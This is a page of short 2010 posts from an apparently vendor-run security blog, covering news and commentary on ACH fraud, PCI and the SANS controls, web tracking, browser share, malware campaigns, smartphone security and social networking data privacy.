Automated Clearing House (ACH) fraud increasing

22. August 2010 · Comments Off on Automated Clearing House (ACH) fraud increasing · Categories: Breach · Tags:

CSOOnline has a good article on ACH (Automated Clearing House) fraud:

Fraud involving the Automated Clearing House (ACH) Network, which is used by financial institutions to handle direct deposits, checks, bill payments and cash transfers between businesses and individuals, is becoming an increasingly popular way for hackers to siphon money out of the bank accounts of unsuspecting victims.

Fraudsters only need two pieces of information to pull off ACH fraud; a checking account number and a bank routing number. They typically obtain the information with a targeted phishing email that tricks the victim into running malicious software which then allows criminals to install keylogging software and steal bank account passwords.

In order to reduce the risk of this type of exploit, we recommend using a bootable, secure “Trusted Client” on an encrypted USB stick from Becrypt.

A framework to replace PCI?

22. August 2010 · Comments Off on A framework to replace PCI? · Categories: PCI Compliance, SANS 20 Critical Controls · Tags:

There has been much commentary this past week about the limited enhancements in the upcoming PCI-DSS 2.0 framework. Martin McKeay wrote a post, How would I write a framework to replace PCI? where he talks about three key principles: (1) Everything flows from policy, (2) Keep it simple, and (3) Concentrate on results, not technologies.

I see it differently. The key principles of the SANS Twenty Critical Security Controls for Effective Cyber Defense make more sense and provide the basis for the Cymbel Approach:

  • Offense must inform defense – knowledge of actual attacks that have compromised systems provides an essential foundation for on which to construct effective defenses.
  • Work from a prioritized baseline of information security measures and controls
  • Most controls must be automated – there is no way for an organization to cost effectively defend itself with manual controls
  • Measure the effectiveness of controls – Automated techniques, where possible, should be used to measure the effectiveness of deployed controls.

Furthermore, regarding policies – you cannot start the process with policies without establishing context first. Therefore we start our processes with Visibility. You can read more about this on the Cymbel Services page.

Marketers “spying” on Internet users

22. August 2010 · Comments Off on Marketers “spying” on Internet users · Categories: Privacy · Tags: ,

The Wall St. Journal (via The New School of Information Security blog) has a very nice interactive tool, What They Know, for exploring the tracking files used by the 50 most popular U.S. websites and WSJ.com.

Is this spying? To what degree can you “opt out” of these tracking files? It’s not easy for the average web user, but doable. On the other hand, content publishers have a right to monetize their content via advertising and other indirect methods considering they cannot get people to pay directly.

Intel, McAfee, and vPro

22. August 2010 · Comments Off on Intel, McAfee, and vPro · Categories: Security Management · Tags: , ,

How many people remember Intel’s vPro? Do you know if your PC supports vPro? Do you care? It was announced by Intel at least six years ago.

As Intel says on its vPro home page:

Notebook and desktop PCs with Intel® vPro™ technology enable IT to take advantage of hardware-assisted security and manageability capabilities that enhance their ability to maintain, manage, and protect their business PCs. And with the latest IT management consoles from Independent Software Vendors (ISVs) with native Intel vPro technology support, IT can now take advantage of enhanced features to manage notebooks over a wired or corporate wireless network- or even outside the corporate firewall through a wired LAN connection.

PCs with Intel vPro technology integrate robust hardware-based security and enhanced maintenance and management capabilities that work seamlessly with ISV consoles. Because these capabilities are built into the hardware, Intel vPro technology provides IT with the industry’s first solution for OS-absent manageability and down-the-wire security even when the PC is off, the OS is unresponsive, or software agents are disabled.

While vPro looks intriguing, it does not appear to me that ISVs really embraced it. Perhaps one of the reasons for Intel acquiring McAfee was it felt it had to force the issue. The Microsoft approach of “loose” integration was not working and Intel decided to place a bet on the Apple strategy of “tight” integration.


Cameron Diaz tops malware bait list

20. August 2010 · Comments Off on Cameron Diaz tops malware bait list · Categories: Malware · Tags:

McAfee (via Network World) just updated its “malware bait list” and Cameron Diaz came in number one.

Most anti-malware vendors, including McAfee offer a service to flag risky sites in search results that appear right in the search results, thus helping you avoid malware-laden web pages.

This is just another example of the “inside-out” attack style which, while rather random, is still a major risk considering that the bad guys watch for popular search terms and build sites to bait people.

Internet Explorer 6 still represents more than 16% of web traffic

19. August 2010 · Comments Off on Internet Explorer 6 still represents more than 16% of web traffic · Categories: Uncategorized

I was reviewing Zscaler’s State of the Web – Q2 2010 and was surprised to learn that Zscaler is seeing 16% of web traffic is still using Internet Explorer 6! Since Zscaler can be configured to prevent the use of IE 6, my guess is that IE 6 usage in the general population is even higher.

There is good news though – the trend for IE 6 and IE 7 is down and IE 8 is up, but IE 7 is still the most used browser by far at 25%. Firefox is second at 10%.

Is there a Facebook “Dislike” button?

16. August 2010 · Comments Off on Is there a Facebook “Dislike” button? · Categories: Malware

Apparently, there ought to be. Sophos’ Graham Cluley has a post about the virally spreading malware, Facebook Dislike button. While Facebook has a legitimate “Like” button, the “Dislike” button is malware.

Malware widget infects 500,000 to 5 million sites

16. August 2010 · Comments Off on Malware widget infects 500,000 to 5 million sites · Categories: Malware · Tags:

Both Brian Krebs and Andy Greenberg (Forbes) are reporting that Network Solutions’ “parked” domain-default registered sites that have not been updated, which number between 500,000 to 5 million, have been infected with a compromised widget from GrowSmartBusiness.com.

By compromising GrowSmartBusiness.com, the attackers were then able to compromise the widgets deployed on the third party sites controlled by Network Solutions. While a widget gives a company tremendous leverage, so too it gives attackers leverage.

From a site owner’s perspective, no matter how rigorous you are with the security of your own site, you also must monitor all third party software you allow on your site, such as third party widgets and advertising networks.

From a corporate security perspective, URL filtering by itself provides no security. You may use URL filtering to control internet use, but that’s it. You must check all components of every web page being downloaded by every user with web access, all the time, whether the user is on your site or remote.

Finally, if you have users performing high risk transactions or processes, and those users also can browse the web, you must assume that their computers are compromised.

Time for security protection on smartphones?

15. August 2010 · Comments Off on Time for security protection on smartphones? · Categories: Malware · Tags: , , , , , ,

Critical vulnerabilities appearing in both iPhones and Android phones point to the need for third party security products.

Apparently Juniper and McAfee think so. Juniper recently announced that it was acquiring SMobile Systems for $70 million. McAfee acquired TenCube. Another product in this space is Lookout.

Finally, which operating system do you think is more secure? Do you prefer closed vs. open source? Here is a recent article from Network World discussing this issue.

Taxonomy of Social Networking Data

15. August 2010 · Comments Off on Taxonomy of Social Networking Data · Categories: Privacy · Tags: ,

Bruce Schneier recently blogged about his A Taxonomy of Social Networking Data essay in the IEEE Security & Privacy magazine. There are six categories of data: Service, Disclosed, Entrusted, Incidental, Behavioral, and Derived.

It’s also clear that users should have different rights with respect to each data type. We should be allowed to export, change, and delete disclosed data, even if the social networking sites don’t want us to. It’s less clear what rights we have for entrusted data — and far less clear for incidental data. If you post pictures from a party with me in them, can I demand you remove those pictures — or at least blur out my face? (Go look up the conviction of three Google executives in Italian court over a YouTube video.) And what about behavioral data? It’s frequently a critical part of a social networking site’s business model. We often don’t mind if a site uses it to target advertisements, but are less sanguine when it sells data to third parties.

« Older articles
Newer articles »